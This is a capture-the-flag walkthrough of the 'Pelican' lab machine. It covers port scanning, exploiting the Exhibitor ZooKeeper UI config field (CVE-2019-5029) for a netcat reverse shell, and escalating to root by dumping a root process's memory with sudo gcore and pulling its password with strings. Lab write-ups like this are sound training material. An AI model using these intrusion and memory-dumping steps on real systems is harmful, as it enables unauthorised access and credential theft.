Pelican

Enumeration:

Port Scanning:

As always we are going to start with nmap scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.222.98
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 07:31 +03
Nmap scan report for 192.168.222.98                                                                                                                        07:57:38 [36/216]
Host is up, received reset ttl 61 (0.11s latency).                                                                                                                          
Scanned at 2025-10-02 07:31:05 +03 for 367s                                                                                                                                 
Not shown: 65526 closed tcp ports (reset)                                                                                                                                   
PORT      STATE SERVICE     REASON         VERSION                                                                                                                          
22/tcp    open  ssh         syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                                   
| ssh-hostkey:                                                                                                                                                              
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)                                                                                                              
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bd
D5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyx
Yuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61                                                                                                                                      
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)                                                                                                             
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=          
|   256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)                                                                                                           
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0                                                                                          
139/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)                                                                                      
445/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)                                                                                   
631/tcp   open  ipp         syn-ack ttl 61 CUPS 2.2                                                                                                                         
| http-methods:                                                                                                                                                             
|   Supported Methods: GET HEAD OPTIONS POST PUT                                                                                                                            
|_  Potentially risky methods: PUT                                                                                                                                          
|_http-title: Forbidden - CUPS v2.2.10                                                                                                                                      
|_http-server-header: CUPS/2.2 IPP/2.1                                                                                                                                      
2181/tcp  open  zookeeper   syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014)                                                                                    
2222/tcp  open  ssh         syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                                   
| ssh-hostkey:                                                                                                                                                              
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)                                                                                                              
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bd
D5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyx
Yuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61                                                                                                                                      
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)                                                                                                             
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
|   256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
8080/tcp  open  http        syn-ack ttl 61 Jetty 1.0
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(1.0)
8081/tcp  open  http        syn-ack ttl 61 nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://192.168.222.98:8080/exhibitor/v1/ui/index.html
|_http-server-header: nginx/1.14.2
46295/tcp open  java-rmi    syn-ack ttl 61 Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have samba running on port 445, and ssh running on 22 and 2222, and java rmi, and multiple web server running on different ports.

Inspect them one by one:

I skipped palying with it to try to find any other low-hanging fruite on other applications.

Also nothing here.

I searched using searchsploit for vulnerabilities related to the running services and its versions, nothing really interesting.

HTTP (8080):

We have exhibitor for zookeeper running on port 8080:

Exploitation:

Reverse shell as charles:

I searched online for any public exploits.

We will find that it is vulnerable to RCE.

There is no authentication process to at least reduce its severity, also it accepts user input without any sanitization in java.env script field of the application.

We can use this script to help us execute the vulnerability:

GitHub - thehunt1s0n/Exihibitor-RCE: Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029GitHub

Or we can exploit it ourselves:

Exhibitor Web UI 1.7.1 - Remote Code ExecutionExploit Database

We will navigate to config, and we will find the desired field:

We will check editing button to allow us edit the fields, I will add a nc reverse shell:

Then click on commit:

Click on all at once:

Before we click ok, we need to start our netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ nc -nlvp 1337
listening on [any] 1337 ...

Then click ok.

We will get a reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.45.186] from (UNKNOWN) [192.168.222.98] 43428
id
uid=1000(charles) gid=1000(charles) groups=1000(charles)

Stabilize it so we can use commands such as sudo, etc.

which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
charles@pelican:/opt/zookeeper$ export TERM=xterm
export TERM=xterm
charles@pelican:/opt/zookeeper$ ^Z
zsh: suspended  nc -nlvp 1337

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Pelican]
└─$ stty raw -echo ; fg
[1]  + continued  nc -nlvp 1337

charles@pelican:/opt/zookeeper$ stty rows 43 cols 172

Privilege Escalation:

After doing some enumeration, we will find that we can run a binary with sudo command as root:

charles@pelican:/$ sudo -l
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore

Search online to understand what this tools does:

So we can dump in some way a process via this tool.

Search for any interesting process:

charles@pelican:/$ ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 01:13 ?        00:00:00 /sbin/init
root         2     0  0 01:13 ?        00:00:00 [kthreadd]
<snipped>
root       483     1  0 01:13 ?        00:00:00 /usr/sbin/cups-browsed
root       490     1  0 01:13 ?        00:00:00 /usr/bin/password-store
root       491     1  0 01:13 ?        00:00:00 /usr/lib/policykit-1/polkitd --no-debug

We will find this weird program password-store running as the root user.

It seems to be storing credentials in some way.

Lets attempt to dump it using gcore:

charles@pelican:/$ sudo gcore
usage:  gcore [-a] [-o filename] pid

We can output the result to a file:

charles@pelican:/zookeeper/data$ sudo gcore -o password-store 490
0x00007fec7ea386f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffd84db2450, remaining=remaining@entry=0x7ffd84db2450) at ../sysdeps/unix/sysv/linux/nanoslee
p.c:28
28      ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile password-store.490
[Inferior 1 (process 490) detached]
charles@pelican:/zookeeper/data$ ls -la
total 368
drwxr-xr-x 3 charles charles   4096 Oct  2 02:02 .
drwxr-xr-x 3 charles charles   4096 Sep 10  2020 ..
-rw-r--r-- 1 charles charles      2 Oct  2 01:38 myid
-rw-r--r-- 1 root    root    354448 Oct  2 02:02 password-store.490
drwxr-xr-x 2 charles charles   4096 Sep 10  2020 version-2
-rw-r--r-- 1 charles charles      5 Oct  2 01:38 zookeeper_server.pid

We dumpped it successfully.

We can confirm that this is a binary:

charles@pelican:/zookeeper/data$ file password-store.490 
password-store.490: ELF 64-bit LSB core file, x86-64, version 1 (SYSV), SVR4-style, from '/usr/bin/password-store', real uid: 0, effective uid: 0, real gid: 0, effective gi
d: 0, execfn: '/usr/bin/password-store', platform: 'x86_64'

Check what it contains using strings:

charles@pelican:/zookeeper/data$ strings password-store.490 | less
    <snipped>
    /lib/x86_64-linux-gnu/libc.so.6
    /usr/bin/passwor
    ////////////////
    /usr/bin/passwor
    ////////////////
    001 Password: root:
    ClogKingpinInning731
    x86_64
    /usr/bin/password-store
    HOME=/root
    LOGNAME=root
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    LANG=en_US.UTF-8
    SHELL=/bin/sh
    PWD=/root
    /usr/bin/password-store    

We will find a psssword, lets check if this is still valid:

charles@pelican:/zookeeper/data$ su root         
Password: ClogKingpinInning731
root@pelican:/zookeeper/data#

We rooted this box.

Get the flags:

root@pelican:~# cat proof.txt
b8e860dceda73067ea8ec1b9297c314c
root@pelican:~# cat /home/charles/local.txt  
8f2ee45cd931ba726fd8e0c8b2d4f2e0